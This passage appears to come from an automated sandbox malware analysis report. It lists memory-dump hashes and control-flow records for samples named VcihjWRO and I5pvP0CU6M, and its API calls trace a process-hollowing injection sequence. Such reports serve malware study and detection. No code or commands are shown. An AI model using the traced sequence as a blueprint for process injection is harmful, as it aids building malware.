                                                          • Opcode Fuzzy Hash: ecf76333c4857edb0cae155a2ed822a1bfe38db2c40391184a4fb299c42cee64
                                                          • Instruction Fuzzy Hash: 7811B276508684CFCB11CF10D9C4B19FB61FB84328F24C6AADC495B656C33AD84ACBA2
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324064629.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_e4d000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 041cc0a9a8ffda182daeac0353e363366bec32118e5c829f45da5f7cffe2d90d
                                                          • Instruction ID: 7d82643f9acb98ed03ebb144eca936d232b34cb55182a8e957a4a2b63f04b94a
                                                          • Opcode Fuzzy Hash: 041cc0a9a8ffda182daeac0353e363366bec32118e5c829f45da5f7cffe2d90d
                                                          • Instruction Fuzzy Hash: 8001267110C3449AE7208F25ED84B67FFDCEF40378F18D05AEE096A283C6B99840D6B1
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324064629.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_e4d000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 05eff60cd7905268df375edf3f7b338c64d76fca82152d70bcabea10cfc54eb2
                                                          • Instruction ID: feca6048f7e456bb4240e67afbf0c0e1d33727c8d0e7d2a5587e9e44248622a1
                                                          • Opcode Fuzzy Hash: 05eff60cd7905268df375edf3f7b338c64d76fca82152d70bcabea10cfc54eb2
                                                          • Instruction Fuzzy Hash: 0BF062724093449EE7208E15DDC4B67FFD8EB51778F18C55AED085A283C279AC44CA71

                                                          Execution Graph

                                                          Execution Coverage:11%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:218
                                                          Total number of Limit Nodes:14
                                                          [Execution graph: node/edge listing omitted. API calls labelled on its nodes: CreateIconFromResourceEx, ResumeThread, CreateActCtxA, DuplicateHandle, WriteProcessMemory, Wow64SetThreadContext, ReadProcessMemory, CreateProcessA, VirtualAllocEx, PostMessageW, CallWindowProcW, GetModuleHandleW]
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07024626
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07024626
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0

                                                          Control-flow Graph

                                                          [Control-flow graph not reproduced. API call named in it: GetModuleHandleW]
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2314634946.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ec0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00EC59A9
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2314634946.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ec0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00EC59A9
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2314634946.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ec0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0

                                                          Control-flow Graph

                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 04EB4161
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2318320034.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_4eb0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 07000D5F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320117943.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7000000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: CreateFromIconResource
                                                          • String ID:
                                                          • API String ID: 3668623891-0

                                                          Control-flow Graph

                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070241F8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0

                                                          Control-flow Graph

                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00ECD4A6,?,?,?,?,?), ref: 00ECD567
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2314634946.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ec0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0

                                                          Control-flow Graph

                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070241F8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0

                                                          Control-flow Graph

                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0702404E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0

                                                          Control-flow Graph

                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070242D8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00ECD4A6,?,?,?,?,?), ref: 00ECD567
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2314634946.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ec0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0702404E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070242D8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07024116
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07024116
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07027EF5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00ECB13E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2314634946.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ec0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07027EF5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0

                                                          Execution Graph

                                                          Execution Coverage:10.9%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:30
                                                          Total number of Limit Nodes:1
                                                          execution_graph 38525 6bc6361 38526 6bc62fc 38525->38526 38527 6bc636a 38525->38527 38531 6bc7400 38526->38531 38535 6bc73f1 38526->38535 38528 6bc631d 38532 6bc7448 38531->38532 38533 6bc7451 38532->38533 38539 6bc6f98 38532->38539 38533->38528 38537 6bc738d 38535->38537 38536 6bc7451 38536->38528 38537->38535 38537->38536 38538 6bc6f98 LoadLibraryW 38537->38538 38538->38536 38540 6bc75f0 LoadLibraryW 38539->38540 38542 6bc7665 38540->38542 38542->38533 38543 18c0871 38544 18c0889 38543->38544 38547 18c08c8 38543->38547 38552 18c08d8 38543->38552 38548 18c08d8 38547->38548 38557 18c0ce8 38548->38557 38561 18c0ce0 38548->38561 38549 18c093e 38549->38544 38553 18c08fa 38552->38553 38555 18c0ce8 GetConsoleWindow 38553->38555 38556 18c0ce0 GetConsoleWindow 38553->38556 38554 18c093e 38554->38544 38555->38554 38556->38554 38558 18c0d26 GetConsoleWindow 38557->38558 38560 18c0d56 38558->38560 38560->38549 38562 18c0d26 GetConsoleWindow 38561->38562 38564 18c0d56 38562->38564 38564->38549

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 956 6bc75e8-6bc7630 958 6bc7638-6bc7663 LoadLibraryW 956->958 959 6bc7632-6bc7635 956->959 960 6bc766c-6bc7689 958->960 961 6bc7665-6bc766b 958->961 959->958 961->960
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,06BC74A6), ref: 06BC7656
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2446377805.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6bc0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 964 6bc6f98-6bc7630 966 6bc7638-6bc7663 LoadLibraryW 964->966 967 6bc7632-6bc7635 964->967 968 6bc766c-6bc7689 966->968 969 6bc7665-6bc766b 966->969 967->966 969->968
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,06BC74A6), ref: 06BC7656
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2446377805.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6bc0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 972 18c0ce0-18c0d54 GetConsoleWindow 975 18c0d5d-18c0d82 972->975 976 18c0d56-18c0d5c 972->976 976->975
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2426112627.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_18c0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWindow
                                                          • String ID:
                                                          • API String ID: 2863861424-0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 980 18c0ce8-18c0d54 GetConsoleWindow 983 18c0d5d-18c0d82 980->983 984 18c0d56-18c0d5c 980->984 984->983
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2426112627.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_18c0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWindow
                                                          • String ID:
                                                          • API String ID: 2863861424-0

                                                          • Opcode Fuzzy Hash: 34038fb12b0921fca31e39ace1b296dda196410679e0a0b506a26f38082e4430
                                                          • Instruction Fuzzy Hash: E8516AB0700306CFCB28DF28D544AAABBF6FF84310F10852EE91597655DB74E946CB91
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 93159a8db158dc7dc50edd62367550441e1ae2d1e35e5da65428f83314194ba8
                                                          • Instruction ID: 73234df6c14ea7370db4589212754987be5975076358d8f7541a7ea6982978e4
                                                          • Opcode Fuzzy Hash: 93159a8db158dc7dc50edd62367550441e1ae2d1e35e5da65428f83314194ba8
                                                          • Instruction Fuzzy Hash: 175105B4A003598FCB54DFA9D880ADEBBF6FF88350F10446AE909EB314E7719841CB90
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: df73c4fb9034119b8132716203623d7f80073e158edb71ae27927eb9e2ff942f
                                                          • Instruction ID: 7c73c2c012c400babbbfc6391fadf7efc5463c6878009f35658542ec4cda0bbb
                                                          • Opcode Fuzzy Hash: df73c4fb9034119b8132716203623d7f80073e158edb71ae27927eb9e2ff942f
                                                          • Instruction Fuzzy Hash: E041C0B23147029FD7388A7988007ABB7EEBF86250F544E5AD983D7680DF25EC418771
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2425259151.000000000186D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0186D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_186d000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ea52f096994a9af1099962ba32b08f8da536755a9d65855b08174bd6fb6dd437
                                                          • Instruction ID: 4b297a32bf78e0a7a0b39ea12e3ac3190facfb8e5da10dfc34a7673e66b0fede
                                                          • Opcode Fuzzy Hash: ea52f096994a9af1099962ba32b08f8da536755a9d65855b08174bd6fb6dd437
                                                          • Instruction Fuzzy Hash: 5D213872604244EFCF15DF54D9C0B26BF69FB88314F24C258EA498B256C376D516CBA2
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2425322097.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_187d000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6b3d37dbbbaa97f16ed2954d8270f2d3905257a018bf9069072baf842709fdec
                                                          • Instruction ID: 08373442f03f9e2f4ca587a595e98bcb71b7480876d5ab41903fdfdd694ed225
                                                          • Opcode Fuzzy Hash: 6b3d37dbbbaa97f16ed2954d8270f2d3905257a018bf9069072baf842709fdec
                                                          • Instruction Fuzzy Hash: E22165B2104204EFDB05DF54D9C0B2ABB65FF84328F24C66DD8098B252C37AD506CAA1
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2425322097.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_187d000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a77ccbbb74d9fe8e00dd830b8bb23106d7f893367698d9d19e0d2a2e736e21e
                                                          • Instruction ID: adda708345cc37aa40e1f04d405de23376ea41f328b0d4adf352b557d588f738
                                                          • Opcode Fuzzy Hash: 6a77ccbbb74d9fe8e00dd830b8bb23106d7f893367698d9d19e0d2a2e736e21e
                                                          • Instruction Fuzzy Hash: BE214971504204EFDB05DF94C5C0B26BB61FF88318F24C66DE9098B252C77BE546CA62
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0efe3e308e8e29e899d5f1c84ca0d2d896601b5a9c9dcba11ded3f32d86f6bd5
                                                          • Instruction ID: 0b1b5473e5521f0ee4d85b70bcc03671de37c34d7b3c106d84c519892cd8e18a
                                                          • Opcode Fuzzy Hash: 0efe3e308e8e29e899d5f1c84ca0d2d896601b5a9c9dcba11ded3f32d86f6bd5
                                                          • Instruction Fuzzy Hash: E511B2B371825A9FE718DA69E8416EAB7D9FBC8370B148137E504C7540EA35A411C7A4
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 79595ae99299a735d087ba02f424bf6beb8425fb06e3b428128ace2cedc2afb7
                                                          • Instruction ID: 448707ea4dbdb7cb6efc9a5d2223bdbe5bbf8123ed7507d5f5e72ac793bd6686
                                                          • Opcode Fuzzy Hash: 79595ae99299a735d087ba02f424bf6beb8425fb06e3b428128ace2cedc2afb7
                                                          • Instruction Fuzzy Hash: 55218E75A00289AFDB15CFE4C845ADEBBB5FF48310F04809AE910AB389C731D855CB50
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 944268fce5f314fdd4042cd2290271df74b67cbd7f65b7b85fb9a6cce7a07c17
                                                          • Instruction ID: dd9eaec6953b9853c7d2f54874b31339fc32664beb80a6fe8f78a2a62e65b2d9
                                                          • Opcode Fuzzy Hash: 944268fce5f314fdd4042cd2290271df74b67cbd7f65b7b85fb9a6cce7a07c17
                                                          • Instruction Fuzzy Hash: 5E11E072300214EFD7198F64DD84BEA7BBAFF85320F14855AFA099B292CA31DD01CB60
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d5251970013ba70d8fac3cd746e96779b12abf8ed97e34393c7a1d4ba4ebd84
                                                          • Instruction ID: f56be9b9cc9c2f9dd777f4873a91dd044064b4a971bb8443f52e3390e7754cf9
                                                          • Opcode Fuzzy Hash: 7d5251970013ba70d8fac3cd746e96779b12abf8ed97e34393c7a1d4ba4ebd84
                                                          • Instruction Fuzzy Hash: AB1142712047068FD725DF29E8409DBBFE5EF85350700872EE5498BA21EB71F9498BE1
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2425259151.000000000186D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0186D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_186d000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 83fb694dd1e91a6ea135483331fab76a04ef60c4faa8ae053019808facf22284
                                                          • Instruction ID: 446a0473d7ea324e3e896ea9e33c58cedc917cd15597b6c170815978c3b3f41e
                                                          • Opcode Fuzzy Hash: 83fb694dd1e91a6ea135483331fab76a04ef60c4faa8ae053019808facf22284
                                                          • Instruction Fuzzy Hash: E221CD76504680DFCB06CF44D9C0B16BF72FB88314F2482A9D9484A257C33AD526CBA1
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 700999af372d077b4e7072cf792a250667f05f474e0338a9d08a4b22f40a0225
                                                          • Instruction ID: 6be329ae3f4ee371b762992fc2bfff810a647ce305cd3adedcc44ce8502b0bee
                                                          • Opcode Fuzzy Hash: 700999af372d077b4e7072cf792a250667f05f474e0338a9d08a4b22f40a0225
                                                          • Instruction Fuzzy Hash: C911A575700215EFE7588E65DC45BAA7BEAFB84320F148429F9098B291CB71ED01C750
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2425322097.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_187d000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                          • Instruction ID: 655b449e9f06e6c6bac742091c40a0ef21c76660ca414b663daede955ec7889d
                                                          • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                          • Instruction Fuzzy Hash: 1411BBB5504280CFCB02CF54C5C0B15BFA1FB88318F28C6AAE8498B257C33AD54ACB62
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2425322097.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_187d000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ecf76333c4857edb0cae155a2ed822a1bfe38db2c40391184a4fb299c42cee64
                                                          • Instruction ID: ff25457dae29f63c5396f1bc1bffd2dcef52c50acb2346c5f3d5d0dc8bdbafe3
                                                          • Opcode Fuzzy Hash: ecf76333c4857edb0cae155a2ed822a1bfe38db2c40391184a4fb299c42cee64
                                                          • Instruction Fuzzy Hash: 1011BF76504684CFDB12CF14D5C4B19FF61FB84324F28C6AAD8498B656C33AD54ACBA2
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
